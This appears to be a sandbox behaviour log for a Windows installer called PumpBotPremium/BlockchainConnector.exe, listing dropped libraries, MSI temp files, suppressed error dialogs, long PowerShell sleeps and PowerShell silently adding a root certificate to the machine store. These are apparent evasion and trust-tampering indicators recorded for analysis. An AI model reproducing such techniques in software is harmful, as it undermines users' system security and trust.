Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pywintypes310.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899884
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899772
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899652
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899373
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899262
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899151
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897906
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7119
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4569
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1724
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1237
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2538
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI8554.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7BF7.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C48.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7B99.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7CB7.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C27.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C87.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll
